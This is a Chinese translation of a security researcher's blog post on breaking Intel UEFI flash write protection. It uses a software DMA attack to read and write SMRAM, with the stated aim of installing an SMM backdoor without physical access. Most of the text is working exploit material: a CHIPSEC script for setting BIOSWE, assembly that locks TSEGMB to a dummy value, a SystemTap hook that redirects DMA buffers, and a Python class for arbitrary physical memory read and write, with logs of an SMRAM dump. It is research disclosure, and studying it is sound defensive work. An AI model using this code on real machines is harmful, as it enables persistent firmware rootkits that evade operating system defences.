翻译 · 2021年1月6日 0


原文: http://blog.cr4.sh/2015/09/breaking-uefi-security-with-software.html

大家好!在本文中,我将告诉你更多关于UEFI漏洞利用的信息。上次在“UEFI引导脚本表漏洞利用”的文章中,我展示了如何在PEI的早期阶段执行任意shellcode,从而绕过保护系统管理模式(SMM)内存(SMRAM)免受DMA攻击的安全机制。现在,我们将对SMRAM执行DMA攻击,禁用BIOS_CNTL flash写保护——使我们能够将受感染的固件写入主板上的ROM芯片。这种攻击可以用于安装我的SMM后门,而不需要物理访问目标机器(在之前的文章中,我解释了它是如何工作的,以及如何使用编程器安装它)。我的DMA软件攻击方法基于Linux操作系统,可劫持磁盘驱动器使用的DMA缓冲区的物理地址,这种攻击的概念最初是Rafal Wojtczuk在BH US 2008“Subverting the Xen hypervisor”的演讲中提出的。


英特尔硬件提供两种主要机制来保护位于主板上的SPI ROM芯片不被操作系统上的软件写入:

  • 通过PCI配置空间访问的平台控制器集线器(PCH)中BIOS_CNTL寄存器的BIOS Write Enable (BIOSWE) 和 BIOS Lock Enable (BLE)位。
  • SPI保护区域寄存器PR0-PR5。同时,PCH中 HSFS 寄存器的FLOCKDN位用于保护PR寄存器不被覆盖。

我在以前的UEFI实验中使用的测试硬件,Intel DQ77KB主板,没有设置SPI保护区域,这对攻击者来说是很好的目标,因为这种安全机制(不像BIOS_CNTL保护)不依赖于系统管理模式,也不可能被我们所说的SMRAM上的DMA软件攻击所击败。因此,本文中的技术主要适用于使用BIOS_CNTL实现flash写保护的主板和笔记本电脑。 以下是Intel® 7 Series / C216 Chipset Family Platform Controller Hub datasheet中关于BIOSWEBLE位的描述:


BIOSWE位用于控制对闪存芯片的写访问, 清零 后只允许读取访问。BLE位更有趣,它用于保护BIOSWE位不被SMM代码进行未经授权的修改。让我们来看看它是怎么工作的:

  1. 在早期引导阶段,系统固件将BIOSWE位清零并设置BLE位,一旦BLE位被设为1——直到下一次平台重置,它都不能被修改。
  2. BLE = 1时,每次尝试设置BIOSWE位都会引发系统管理中断(SMI) —— 最高优先级的中断,将挂起操作系统的执行并将CPU切换到系统管理模式。
  3. 在SMI调度期间,SMM代码将BIOSWE位清零,并恢复OS执行,因此,在OS下运行的攻击者代码可以重新设置BIOSWE

在正确配置且被锁定的平台上,操作系统不能访问在PEI/DXE引导阶段由固件安装的SMM代码,因此,它可以作为安全代理,防止BIOS写保护配置遭受未经授权的修改。让我们来做一个小实验: 我们可以使用CHIPSEC platform security assessment framework编写一个Python脚本来访问BIOS_CNTL寄存器并尝试设置BIOSWE位:

def BIOSWE_set():

   BIOSWE = 1

   # import required CHIPSEC stuff
   import chipsec.chipset
   from chipsec.helper.oshelper import helper

   # initialize CHIPSEC helper
   cs = chipsec.chipset.cs()
   cs.init(None, True)

   # check if BIOS_CNTL register is available
   if not chipsec.chipset.is_register_defined(cs, 'BC'):

       raise Exception('Unsupported hardware')

   # get BIOS_CNTL value
   val = chipsec.chipset.read_register(cs, 'BC')

   print '[+] BIOS_CNTL is 0x%x' % val

   if val & BIOSWE == 0:

       print '[+] Trying to set BIOSWE...'

       # try to set BIOS write enable bit
       chipsec.chipset.write_register(cs, 'BC', val | BIOSWE)

       # check if BIOSWE bit was actually set
       val = chipsec.chipset.read_register(cs, 'BC')
       if val & BIOSWE == 0:

           # fails, BIOSWE modification was prevented by SMM
           print '[!] Can\'t set BIOSWE bit, BIOS write protection is enabled'


           print '[+] BIOSWE bit was set, BIOS write protection is disabled now'


       print '[+] BIOSWE bit is already set'

if __name__ == '__main__':


以root权限运行此脚本后,我们能看到在Intel DQ77KB主板上,由于启用了BLE保护,无法设置BIOSWE

localhost ~ # python BIOSWE_set.py
[+] BIOS_CNTL is 0x2a
[+] Trying to set BIOSWE...
[!] Can't set BIOSWE bit, BIOS write protection is enabled




  1. 软件为I/O操作数据分配物理内存块,并为该内存创建物理区域描述符表(PRDT)的表项。PRDT —— 是 DMA控制器中用于 映射到物理内存空间的一种特殊的数据结构。
  2. 软件会初始化磁盘控制器的总线主控寄存器,可通过PCI配置空间使用PRDT地址访问磁盘控制器的总线主控寄存器,并在该控制器上启用总线主控器操作模式。
  3. 要开始I/O操作,软件会把DMA读(0xC8/0x25)或DMA写(0xCA/0x35)的ATA/ATAPI命令发送到目标磁盘设备。发送命令后——操作系统可以将执行上下文切换到其他任务,直到I/O操作未完成。
  4. DMA控制器响应来自磁盘设备的DMA请求,并将数据写入物理内存。
  5. 数据传输完成后,磁盘设备将发出一个中断信号,该信号允许操作系统恢复挂起的任务执行。

很容易看出这种设计并不安全——具有恶意DMA功能的硬件可以忽略通过PRDT设置的缓冲区地址,并且可以在不需要任何软件许可的情况下将任意数据读/写到物理内存的任意位置。为缓解此问题,英特尔推出了VT-d —— 英特尔用于定向I/O的虚拟化技术(也称为IOMMU),该技术限制了从硬件直接访问物理内存。Windows,Linux和OS X的现代版本中都提供了IOMMU支持,但是在某些固件攻击的情况下,当攻击者已经完全控制了操作系统后,还需要为SMRAM采用单独的(独立于操作系统或hypervisor)DMA保护机制。 该机制的名称是TSEGMB寄存器,在先前的文章中已经提到过,必须在平台初始化期间通过固件对其进行正确配置且锁定:



; bus = 0, dev = 0, func = 0, offset = 0xb8
mov     eax, 0x800000b8
mov     dx, 0xcf8
out     dx, eax

; read TSEGMB value
mov     dx, 0xcfc
in      eax, dx

; check if TSEGMB is not locked
and     eax, 1
test    eax, eax
jnz     _end

; bus = 0, dev = 0, func = 0, offset = 0xb8
mov     eax, 0x800000b8
mov     dx, 0xcf8
out     dx, eax

; write and lock TSEGMB with dummy value
mov     eax, 0xff000001
mov     dx, 0xcfc
out     dx, eax


; ...


localhost chipsec # python chipsec_main.py -m smm_dma

[+] loaded chipsec.modules.smm_dma
[*] running loaded modules ..

[*] running module: chipsec.modules.smm_dma
[*] Module path: /usr/src/chipsec/source/tool/chipsec/modules/smm_dma.pyc
[x][ =======================================================================
[x][ Module: SMRAM DMA Protection
[x][ =======================================================================
[*] Registers:
[*] PCI0.0.0_TOLUD = 0xDFA00001 << Top of Low Usable DRAM (b:d.f 00:00.0 + 0xBC)
  [00] LOCK             = 1 << Lock
  [20] TOLUD           = DFA << Top of Lower Usable DRAM
[*] PCI0.0.0_BGSM = 0xD7800001 << Base of GTT Stolen Memory (b:d.f 00:00.0 + 0xB4)
  [00] LOCK             = 1 << Lock
  [20] BGSM             = D78 << Base of GTT Stolen Memory
[*] PCI0.0.0_TSEGMB = 0xD7000001 << TSEG Memory Base (b:d.f 00:00.0 + 0xB8)
  [00] LOCK             = 1 << Lock
  [20] TSEGMB           = D70 << TSEG Memory Base
[*] IA32_SMRR_PHYSBASE = 0xD7000006 << SMRR Base Address MSR (MSR 0x1F2)
  [00] Type             = 6 << SMRR memory type
  [12] PhysBase         = D7000 << SMRR physical base address
[*] IA32_SMRR_PHYSMASK = 0xFF800800 << SMRR Range Mask MSR (MSR 0x1F3)
  [11] Valid           = 1 << SMRR valid
  [12] PhysMask         = FF800 << SMRR address range mask

[*] Memory Map:
[*]   Top Of Low Memory             : 0xDFA00000
[*]   TSEG Range (TSEGMB-BGSM)     : [0xD7000000-0xD77FFFFF]
[*]   SMRR Range (size = 0x00800000): [0xD7000000-0xD77FFFFF]

[*] checking locks..
[+]   TSEGMB is locked
[+]   BGSM is locked
[*] checking TSEG alignment..
[+]   TSEGMB is 8MB aligned
[*] checking TSEG covers entire SMRR range..
[+]   TSEG covers entire SMRAM

[+] PASSED: TSEG is properly configured. SMRAM is protected from DMA attacks


localhost chipsec # python chipsec_main.py -m common.smrr

[+] loaded chipsec.modules.common.smrr
[*] running loaded modules ..

[*] running module: chipsec.modules.common.smrr
[*] Module path: /usr/src/chipsec/source/tool/chipsec/modules/common/smrr.pyc
[x][ =======================================================================
[x][ Module: CPU SMM Cache Poisoning / System Management Range Registers
[x][ =======================================================================
[+] OK. SMRR range protection is supported

[*] Checking SMRR range base programming..
[*] IA32_SMRR_PHYSBASE = 0xD7000006 << SMRR Base Address MSR (MSR 0x1F2)
  [00] Type             = 6 << SMRR memory type
  [12] PhysBase         = D7000 << SMRR physical base address
[*] SMRR range base: 0x00000000D7000000
[*] SMRR range memory type is Writeback (WB)
[+] OK so far. SMRR range base is programmed

[*] Checking SMRR range mask programming..
[*] IA32_SMRR_PHYSMASK = 0xFF800800 << SMRR Range Mask MSR (MSR 0x1F3)
  [11] Valid           = 1 << SMRR valid
  [12] PhysMask         = FF800 << SMRR address range mask
[*] SMRR range mask: 0x00000000FF800000
[+] OK so far. SMRR range is enabled

[*] Verifying that SMRR range base & mask are the same on all logical CPUs..
[CPU0] SMRR_PHYSBASE = 00000000D7000006, SMRR_PHYSMASK = 00000000FF800800
[CPU1] SMRR_PHYSBASE = 00000000D7000006, SMRR_PHYSMASK = 00000000FF800800
[CPU2] SMRR_PHYSBASE = 00000000D7000006, SMRR_PHYSMASK = 00000000FF800800
[CPU3] SMRR_PHYSBASE = 00000000D7000006, SMRR_PHYSMASK = 00000000FF800800
[+] OK so far. SMRR range base/mask match on all logical CPUs
[*] Trying to read memory at SMRR base 0xD7000000..
[+] PASSED: SMRR reads are blocked in non-SMM mode

[+] PASSED: SMRR protection against cache attack is properly configured


localhost chipsec # python chipsec_main.py -m boot_script_table

[+] loaded chipsec.modules.boot_script_table
[*] running loaded modules ..

[*] running module: chipsec.modules.boot_script_table
[*] Module path: /usr/src/chipsec/source/tool/chipsec/modules/boot_script_table.pyc
[x][ =======================================================================
[x][ Module: UEFI boot script table vulnerability exploit
[x][ =======================================================================
[*] AcpiGlobalVariable = 0xd5f53f18
[*] UEFI boot script addr = 0xd5f4c018
[*] Target function addr = 0xd5ddf260
8 bytes to patch
Found 106 zero bytes for shellcode at 0xd5deaf96
Jump from 0xd5deaffb to 0xd5ddf268
Jump from 0xd5ddf260 to 0xd5deaf96
Going to S3 sleep for 10 seconds ...
rtcwake: assuming RTC uses UTC ...
rtcwake: wakeup from "mem" using /dev/rtc0 at Tue Aug 25 08:14:15 2015
[*] BIOS_CNTL = 0x28
[*] TSEGMB = 0xd7000000
[!] Bios lock enable bit is not set
[!] SMRAM is not locked
[!] Your system is VULNERABLE


localhost chipsec # python chipsec_main.py -m smm_dma

[+] loaded chipsec.modules.smm_dma
[*] running loaded modules ..

[*] running module: chipsec.modules.smm_dma
[*] Module path: /usr/src/chipsec/source/tool/chipsec/modules/smm_dma.pyc
[x][ =======================================================================
[x][ Module: SMRAM DMA Protection
[x][ =======================================================================
[*] Registers:
[*] PCI0.0.0_TOLUD = 0xDFA00001 << Top of Low Usable DRAM (b:d.f 00:00.0 + 0xBC)
  [00] LOCK             = 1 << Lock
  [20] TOLUD           = DFA << Top of Lower Usable DRAM
[*] PCI0.0.0_BGSM = 0xD7800001 << Base of GTT Stolen Memory (b:d.f 00:00.0 + 0xB4)
  [00] LOCK             = 1 << Lock
  [20] BGSM             = D78 << Base of GTT Stolen Memory
[*] PCI0.0.0_TSEGMB = 0xFF000001 << TSEG Memory Base (b:d.f 00:00.0 + 0xB8)
  [00] LOCK             = 1 << Lock
  [20] TSEGMB           = FF0 << TSEG Memory Base
[*] IA32_SMRR_PHYSBASE = 0xD7000006 << SMRR Base Address MSR (MSR 0x1F2)
  [00] Type             = 6 << SMRR memory type
  [12] PhysBase         = D7000 << SMRR physical base address
[*] IA32_SMRR_PHYSMASK = 0xFF800800 << SMRR Range Mask MSR (MSR 0x1F3)
  [11] Valid           = 1 << SMRR valid
  [12] PhysMask         = FF800 << SMRR address range mask

[*] Memory Map:
[*]   Top Of Low Memory             : 0xDFA00000
[*]   TSEG Range (TSEGMB-BGSM)     : [0xFF000000-0xD77FFFFF]
[*]   SMRR Range (size = 0x00800000): [0xD7000000-0xD77FFFFF]

[*] checking locks..
[+]   TSEGMB is locked
[+]   BGSM is locked
[*] checking TSEG alignment..
[+]   TSEGMB is 8MB aligned
[*] checking TSEG covers entire SMRR range..
[-]   TSEG doesn't cover entire SMRAM

[-] FAILED: TSEG is not properly configured. SMRAM is vulnerable to DMA attacks


使用SystemTap Hook Linux内核

DMA软件攻击是由Rafal Wojtczuk在他的“Subverting the Xen hypervisor”演讲中提出的:

  1. 为了读取任意物理内存,攻击者会用open()函数的O_DIRECT flag来打开一个空文件,该文件需要绕过文件系统缓存。
  2. 然后攻击者使用mmap()分配一个虚拟的虚拟内存缓冲区,并使用write()系统调用将其写入打开的文件。
  3. 在磁盘写调度过程中,Linux内核的ATAPI驱动程序调用dma_map_sg()函数来设置物理内存缓冲区,以进行分散-聚集 DMA操作。攻击者需要先hook此函数,以迭代在scatterlist结构体中传递的内存缓冲区信息,找到之前分配的缓冲区物理地址,并将其替换为他需要读取的物理内存的地址。
  4. write()函数成功返回时——攻击者可以从文件中读取数据以获取存储的内存内容。

任意物理内存地址的写入场景几乎和它相同,只是攻击者使用的是read()系统调用而不是write()。 内核文档中的“Dynamic DMA mapping Guide”(DMA-API-HOWTO.TXT)是帮助你开始使用Linux DMA API进行设备驱动程序开发的指南。分配给 分散-聚集 DMA操作的内存区域由scatterlist结构体表示。下面是内核头文件的定义,内存缓冲区的物理地址被传递给read()/write()系统调用,通常在dma_address字段中:

struct scatterlist {
       unsigned long   sg_magic;
       unsigned long   page_link;
       unsigned int    offset;
       unsigned int    length;
       dma_addr_t      dma_address;
       unsigned int    dma_length;

Rafal使用了可加载的内核模块来Hook dma_map_sg()函数。不幸的是,在我的Linux内核版本中,此函数被定义为简单宏,被扩展为dma_map_sg_attrs()函数:

#define dma_map_sg(d, s, n, r) dma_map_sg_attrs(d, s, n, r, NULL)

static inline int dma_map_sg_attrs(struct device *dev, struct scatterlist *sg,
int nents, enum dma_data_direction dir,
struct dma_attrs *attrs)
struct dma_map_ops *ops = get_dma_ops(dev);
int i, ents;
struct scatterlist *s;

for_each_sg(sg, s, nents, i)
kmemcheck_mark_initialized(sg_virt(s), s->length);
ents = ops->map_sg(dev, sg, nents, dir, attrs);
BUG_ON(ents < 0);
debug_dma_map_sg(dev, sg, nents, ents, dir);

return ents;

由于dma_map_sg_attrs()是一个内联函数 —— 使得我们无法用简单的方法找到并Hook其代码,因此必须找到其他解决方案。如下,有一个debug_dma_map_sg() 函数的调用也可以Hook:

extern void debug_dma_map_sg(struct device *dev, struct scatterlist *sg,
int nents, int mapped_ents, int direction);

实际上,只有在使用CONFIG_DMA_API_DEBUG选项编译该函数时,此函数才会在内核二进制文件中出现,并且你最喜欢的Linux发行版不太可能使用该函数——因此我们必须从源代码配置和构建新内核。这种限制并不是太好,但为了证明概念,它似乎不是很重要。另外,在实际使用可靠的固件rootkit的情况下,仍然可以实现一些二进制试探法来定位内联函数dma_map_sg_attrs()的代码,但是这并不在本文的讨论范围内。 为了使DMA攻击的PoC更简单一些,我在SystemTap的帮助下实现了debug_dma_map_sg()函数钩子,而不是徒手编写一个可加载的内核模块。SystemTap是DTrace的Linux克隆版本,它允许开发人员和管理员用简化的类c语言编写脚本,以检查Linux系统的活动。SystemTap的工作方式是将脚本翻译成C语言,然后运行system C编译器创建一个内核模块。加载模块后,它通过Hook到内核来激活所有探测到的事件。 下面你可以看到一个简单的SystemTap脚本,它Hook debug_dma_map_sg()函数,并将它的参数信息打印到stdout中:

# kernel function probe handler
probe kernel.function("debug_dma_map_sg")
printf("%s(%d): %s(): %d\n", execname(), pid(), probefunc(), $nents);

# Each call to sys_write() leads to corresponding call of dma_map_sg(),
# $sg argument contains list of DMA buffers
for (i = 0; i < $nents; i++)
printf(" #%d (0x%x): 0x%x\n", i, $sg[i]->length, $sg[i]->dma_address);

在基于debian的系统上,可以使用apt-get install SystemTap命令安装SystemTap。如果你想从源代码安装它——请确保你在编译内核时启用了以下选项:



localhost ~ # stap -v debug_dma_map_sg.stp
Pass 1: parsed user script and 109 library script(s) using 62180virt/36436res/4264shr/32980data kb, in 160usr/10sys/171real ms.
Pass 2: analyzed script: 1 probe(s), 11 function(s), 4 embed(s), 0 global(s) using 108852virt/84660res/5780shr/79652data kb, in 790usr/210sys/997real ms.
Pass 3: translated to C into "/tmp/stapo6EAoq/stap_be741121b1c20b85b38ff640ac798be6_6031_src.c" using 108852virt/84788res/5908shr/79652data kb, in 190usr/50sys/237real ms.
Pass 4: compiled C into "stap_be741121b1c20b85b38ff640ac798be6_6031.ko" in 3430usr/290sys/4579real ms.
Pass 5: starting run.
usb-storage(1110): debug_dma_map_sg(): 9
#0 (0x1000): 0x3ecca2000
#1 (0x1000): 0x2f34000
#2 (0x1000): 0x41e2b4000
#3 (0x1000): 0xd671e000
#4 (0x1000): 0x41e22e000
#5 (0x1000): 0x40687b000
#6 (0x1000): 0x4061b9000
#7 (0x1000): 0xd670e000
#8 (0x1000): 0x41ddc0000
usb-storage(1110): debug_dma_map_sg(): 1
#0 (0x1000): 0x4027e000
usb-storage(1110): debug_dma_map_sg(): 2
#0 (0x1000): 0x4023d6000
#1 (0x1000): 0x3f7be6000
usb-storage(1110): debug_dma_map_sg(): 1
#0 (0x1000): 0x406595000
usb-storage(1110): debug_dma_map_sg(): 1
#0 (0x1000): 0x41e1fb000
usb-storage(1110): debug_dma_map_sg(): 2
#0 (0x1000): 0xd5460000
#1 (0x1000): 0xd522f000
usb-storage(1110): debug_dma_map_sg(): 2



# print more information from running SystemTap script

# script source code

global data_len = 0
global verbose = ''' + ('1' if VERBOSE else '0') + '''

# kernel function probe handler
probe kernel.function("debug_dma_map_sg")
# parse script arguments passed to stap
phys_addr = strtol(@1, 16);
target_addr = strtol(@2, 16);

printf("%s(%d): %s(): %d\\n", execname(), pid(), probefunc(), $nents);

# Each call to sys_write() leads to corresponding call of dma_map_sg(),
# $sg argument contains list of DMA buffers
if (verbose != 0)
for (i = 0; i < $nents; i++)
printf(" #%d (0x%x): 0x%x\\n", i, $sg[i]->length, $sg[i]->dma_address);

# check for data that came from dma_expl.py os.write() call
if ($nents > 0 && $sg[0]->dma_address == phys_addr)
printf("[+] DMA request found, changing address to 0x%x\\n",
target_addr + data_len);

# replace addresses of DMA buffers
for (i = 0; i < $nents; i++)
$sg[i]->dma_address = target_addr + data_len;
data_len += $sg[i]->length;



SCRIPT_PATH = '/tmp/dma_expl.stp'

class Worker(threading.Thread):

def __init__(self, phys_addr, target_addr):

super(Worker, self).__init__()

self.daemon = True
self.started = True
self.count = 0

# drop script file into the /tmp

# run SystemTap script
self.p = subprocess.Popen([ 'stap', '-g', '-v', SCRIPT_PATH,
hex(phys_addr), hex(target_addr) ],
stdout = subprocess.PIPE, stderr = subprocess.PIPE)

# wait for script initialization
while self.started:

line = self.p.stderr.readline()

if line == '':


# check for pass 5 that indicates sucessfully loaded script
elif line.find('Pass 5') == 0:

print '[+] SystemTap script started'

def create_file(self):

# save script contents into the file
with open(SCRIPT_PATH, 'wb') as fd:


def run(self):

while self.started:

# read and print script output
line = self.p.stdout.readline()



if line == '':

self.started = False

# check for hijacked DMA request
elif line.find('[+]') == 0:

self.count += 1

def start(self):

super(Worker, self).start()

# delay after script start

def stop(self):

if self.started:

# delay before script shutdown

self.started = False
os.kill(self.p.pid, signal.SIGINT)

现在,我们需要为磁盘读写分配数据缓冲区,并获取其物理地址。Python具有内置的mmap模块,但是该模块不允许指定分配的内存的虚拟地址。为了解决这个问题,我使用了Clement Rouault在“Understanding Python by breaking it”文中提到的ctypes和neat自我检测hack方法:

import mmap
from ctypes import *

class PyObj(Structure):

_fields_ = [("ob_refcnt", c_size_t),
("ob_type", c_void_p)]

# ctypes object for introspection
class PyMmap(PyObj):

_fields_ = [("ob_addr", c_size_t)]

# class that inherits mmap.mmap and has the page address
class MyMap(mmap.mmap):

def __init__(self, *args, **kwarg):

# get the page address by introspection of the native structure
m = PyMmap.from_address(id(self))
self.addr = m.ob_addr

要将获得的虚拟地址转换为物理地址,需使用/proc/self/pagemap Linux伪文件,它可以找出每个虚拟页映射到的物理帧。虚拟内存的每个页面在页面映射中均表示为单个8字节的结构体,其中包含物理内存页面帧号(PFN)和信息标志。 下面是利用类,它的构造函数接受要读取/写入的物理内存的地址,分配数据缓冲区,获取其物理地址并启动SystemTap脚本:

PAGE_SIZE = 0x1000
TEMP_PATH = '/tmp/dma_expl.tmp'

class DmaExpl(object):

# 单个 dma_map_sg() 调用期间可以传输的最大数据量

def __init__(self, target_addr):

if target_addr & (PAGE_SIZE - 1) != 0:

raise Exception('Address must be aligned by 0x%x' % PAGE_SIZE)

self.phys_addr = 0
self.target_addr = target_addr
self.libc = cdll.LoadLibrary("libc.so.6")

# 分配虚拟数据缓冲区
self.buff = MyMap(-1, self.MAX_IO_SIZE, mmap.PROT_WRITE)
self.buff.write('\x41' * self.MAX_IO_SIZE)

print '[+] Memory allocated at 0x%x' % self.buff.addr

with open('/proc/self/pagemap', 'rb') as fd:

# 读取物理地址信息
fd.seek(self.buff.addr / PAGE_SIZE * 8)
phys_info = struct.unpack('Q', fd.read(8))[0]

# 检查页是否已映射且未交换
if phys_info & (1L << 63) == 0:

raise Exception('Page is not present')

if phys_info & (1L << 62) != 0:

raise Exception('Page is swapped out')

# 从PFN获取物理地址
self.phys_addr = (phys_info & ((1L << 54) - 1)) * PAGE_SIZE

print '[+] Physical address is 0x%x' % self.phys_addr

# 在后台线程中运行SystemTap脚本
self.worker = Worker(self.phys_addr, target_addr)

def close(self):


# ...


class DmaExpl(object):

# ...

def _dma_read(self, read_size):

count = self.worker.count

print '[+] Reading physical memory 0x%x - 0x%x' % \
(self.target_addr, self.target_addr + read_size - 1)

# O_DIRECT is needed to write our data to disk immediately
fd = os.open(TEMP_PATH, os.O_CREAT | os.O_TRUNC | os.O_RDWR | os.O_DIRECT)

# initiate DMA transaction
if self.libc.write(fd, c_void_p(self.buff.addr), read_size) == -1:

raise Exception("write() fails")


while self.worker.count == count:

# wait untill intercepted debug_dma_map_sg() call

with open(TEMP_PATH, 'rb') as fd:

# get readed data
data = fd.read(read_size)


self.target_addr += read_size

return data

def read(self, read_size):

data = ''

if read_size < PAGE_SIZE or read_size % PAGE_SIZE != 0:

raise Exception('Invalid read size')

while read_size > 0:

# We can read only MAX_IO_SIZE bytes of physical memory
# with each os.write() call.
size = min(read_size, self.MAX_IO_SIZE)
data += self._dma_read(size)

read_size -= size

print '[+] DONE'

return data


class DmaExpl(object):

# ...

def _dma_write(self, data):

count = self.worker.count
write_size = len(data)

print '[+] Writing physical memory 0x%x - 0x%x' % \
(self.target_addr, self.target_addr + write_size - 1)

with open(TEMP_PATH, 'wb') as fd:

# get readed data

# O_DIRECT设置需要立即将我们的数据写入磁盘
fd = os.open(TEMP_PATH, os.O_RDONLY | os.O_DIRECT)

# initiate DMA transaction
if self.libc.read(fd, c_void_p(self.buff.addr), write_size) == -1:

raise Exception("read() fails")


while self.worker.count == count:

# 等待直到劫持到debug_dma_map_sg()调用


self.target_addr += write_size

def write(self, data):

ptr = 0
write_size = len(data)

if write_size < PAGE_SIZE or write_size % PAGE_SIZE != 0:

raise Exception('Invalid write size')

while ptr < write_size:

# We can write only MAX_IO_SIZE bytes of physical memory
# with each os.read() call.
self._dma_write(data[ptr : ptr + self.MAX_IO_SIZE])
ptr += self.MAX_IO_SIZE

print '[+] DONE'


# initialize exploit
expl = DmaExpl(0xD7000000)

# perform physical memory read
data = expl.read(0x1000)

# stop SystemTap script

使用此类,我实现了名为dma_expl.py的Python脚本,下面是在Intel DQ77KB主板上将SMRAM的TSEG区域转储到文件中的用法示例。

localhost ~ # python dma_expl.py --read 0xD7000000 --size 0x800000 --file TSEG.bin
[+] Memory allocated at 0x7ff0542ec000
[+] Physical address is 0x3fa15e000
Pass 1: parsed user script and 109 library script(s) using 62176virt/36376res/4216shr/32976data kb, in 160usr/0sys/171real ms.
Pass 2: analyzed script: 1 probe(s), 14 function(s), 4 embed(s), 2 global(s) using 108880virt/84544res/5644shr/79680data kb, in 780usr/220sys/1120real ms.
Pass 3: translated to C into "/tmp/stapcorPM2/stap_c190a79e672287641579099c59eed383_7943_src.c" using 108880virt/84672res/5772shr/79680data kb, in 170usr/60sys/236real ms.
Pass 4: compiled C into "stap_c190a79e672287641579099c59eed383_7943.ko" in 3560usr/270sys/5209real ms.
Pass 5: starting run.
[+] SystemTap script started
[+] Reading physical memory 0xd7000000 - 0xd701dfff
[+] Reading physical memory 0xd701e000 - 0xd703bfff
[+] Reading physical memory 0xd703c000 - 0xd7059fff
[+] Reading physical memory 0xd705a000 - 0xd7077fff
[+] Reading physical memory 0xd7078000 - 0xd7095fff
[+] Reading physical memory 0xd7096000 - 0xd70b3fff
[+] Reading physical memory 0xd70b4000 - 0xd70d1fff
[+] Reading physical memory 0xd70d2000 - 0xd70effff
[+] Reading physical memory 0xd70f0000 - 0xd710dfff
[+] Reading physical memory 0xd710e000 - 0xd712bfff
[+] Reading physical memory 0xd712c000 - 0xd7149fff
[+] Reading physical memory 0xd714a000 - 0xd7167fff
[+] Reading physical memory 0xd7168000 - 0xd7185fff
[+] Reading physical memory 0xd7186000 - 0xd71a3fff
[+] Reading physical memory 0xd71a4000 - 0xd71c1fff
[+] Reading physical memory 0xd71c2000 - 0xd71dffff
[+] Reading physical memory 0xd71e0000 - 0xd71fdfff
[+] Reading physical memory 0xd71fe000 - 0xd721bfff
[+] Reading physical memory 0xd721c000 - 0xd7239fff
[+] Reading physical memory 0xd723a000 - 0xd7257fff
[+] Reading physical memory 0xd7258000 - 0xd7275fff
[+] Reading physical memory 0xd7276000 - 0xd7293fff
[+] Reading physical memory 0xd7294000 - 0xd72b1fff
[+] Reading physical memory 0xd72b2000 - 0xd72cffff
[+] Reading physical memory 0xd72d0000 - 0xd72edfff
[+] Reading physical memory 0xd72ee000 - 0xd730bfff
[+] Reading physical memory 0xd730c000 - 0xd7329fff
[+] Reading physical memory 0xd732a000 - 0xd7347fff
[+] Reading physical memory 0xd7348000 - 0xd7365fff
[+] Reading physical memory 0xd7366000 - 0xd7383fff
[+] Reading physical memory 0xd7384000 - 0xd73a1fff
[+] Reading physical memory 0xd73a2000 - 0xd73bffff
[+] Reading physical memory 0xd73c0000 - 0xd73ddfff
[+] Reading physical memory 0xd73de000 - 0xd73fbfff
[+] Reading physical memory 0xd73fc000 - 0xd7419fff
[+] Reading physical memory 0xd741a000 - 0xd7437fff
[+] Reading physical memory 0xd7438000 - 0xd7455fff
[+] Reading physical memory 0xd7456000 - 0xd7473fff
[+] Reading physical memory 0xd7474000 - 0xd7491fff
[+] Reading physical memory 0xd7492000 - 0xd74affff
[+] Reading physical memory 0xd74b0000 - 0xd74cdfff
[+] Reading physical memory 0xd74ce000 - 0xd74ebfff
[+] Reading physical memory 0xd74ec000 - 0xd7509fff
[+] Reading physical memory 0xd750a000 - 0xd7527fff
[+] Reading physical memory 0xd7528000 - 0xd7545fff
[+] Reading physical memory 0xd7546000 - 0xd7563fff
[+] Reading physical memory 0xd7564000 - 0xd7581fff
[+] Reading physical memory 0xd7582000 - 0xd759ffff
[+] Reading physical memory 0xd75a0000 - 0xd75bdfff
[+] Reading physical memory 0xd75be000 - 0xd75dbfff
[+] Reading physical memory 0xd75dc000 - 0xd75f9fff
[+] Reading physical memory 0xd75fa000 - 0xd7617fff
[+] Reading physical memory 0xd7618000 - 0xd7635fff
[+] Reading physical memory 0xd7636000 - 0xd7653fff
[+] Reading physical memory 0xd7654000 - 0xd7671fff
[+] Reading physical memory 0xd7672000 - 0xd768ffff
[+] Reading physical memory 0xd7690000 - 0xd76adfff
[+] Reading physical memory 0xd76ae000 - 0xd76cbfff
[+] Reading physical memory 0xd76cc000 - 0xd76e9fff
[+] Reading physical memory 0xd76ea000 - 0xd7707fff
[+] Reading physical memory 0xd7708000 - 0xd7725fff
[+] Reading physical memory 0xd7726000 - 0xd7743fff
[+] Reading physical memory 0xd7744000 - 0xd7761fff
[+] Reading physical memory 0xd7762000 - 0xd777ffff
[+] Reading physical memory 0xd7780000 - 0xd779dfff
[+] Reading physical memory 0xd779e000 - 0xd77bbfff
[+] Reading physical memory 0xd77bc000 - 0xd77d9fff
[+] Reading physical memory 0xd77da000 - 0xd77f7fff
[+] Reading physical memory 0xd77f8000 - 0xd77fffff
[+] DONE


现在我们可以读写SMRAM的内容了,通过修改其代码,可以防止SMM中的BIOSWE位复位。 你可能已经从Intel® 64 and IA-32 Architectures Software Developer’s Manual系统编程指南的第三章中了解到了:当处理器切换到系统管理模式时,它会开始执行SMI处理程序代码,该代码位于距SMRAM开头的固定偏移量0x8000处:



localhost ~ # hexdump -C --skip 0x8000 --length 0x100 TSEG.bin
00008000 00 10 00 00 00 00 00 00 00 00 0a 00 00 00 00 00 |................|
00008010 ee 03 00 00 00 00 00 00 b6 d7 15 77 34 b0 ff 97 |...........w4...|
00008020 83 46 8f 3f 79 14 d9 c5 99 94 82 dc ff e0 da bf |.F.?y...........|
00008030 c3 5b 2d 31 28 93 71 06 54 7d 64 20 8c 9a a3 82 |.[-1(.q.T}d ....|
00008040 bf 6b a2 e0 6a 13 4b 99 3c a2 c3 58 0a 3a 7b 8f |.k..j.K.<..X.:{.|
00008050 2d 24 cb 56 8e 4e b9 38 20 b3 4d 9c 4d 1a 58 8f |-$.V.N.8 .M.M.X.|
00008060 ce a9 3a 51 f6 6c 05 57 7b 2f 60 13 5b 5d d3 b4 |..:Q.l.W{/`.[]..|
00008070 a5 05 0f 07 ec c5 88 d1 91 5e 95 0a 21 11 ee 5a |.........^..!..Z|
00008080 8a 7f 0b a3 3b da f8 62 5c 56 e2 b7 4d 50 c2 e7 |....;..b\V..MP..|
00008090 1e a7 41 cd 1e 6c ea f9 de 36 a1 05 6e 08 d2 8b |..A..l...6..n...|
000080a0 1b 90 e1 d4 cf 61 02 ff 6b c4 fb fe c3 74 84 f5 |.....a..k....t..|
000080b0 27 63 5d ac 90 dd 2d 01 d4 4a a4 39 6c 97 53 84 |'c]...-..J.9l.S.|
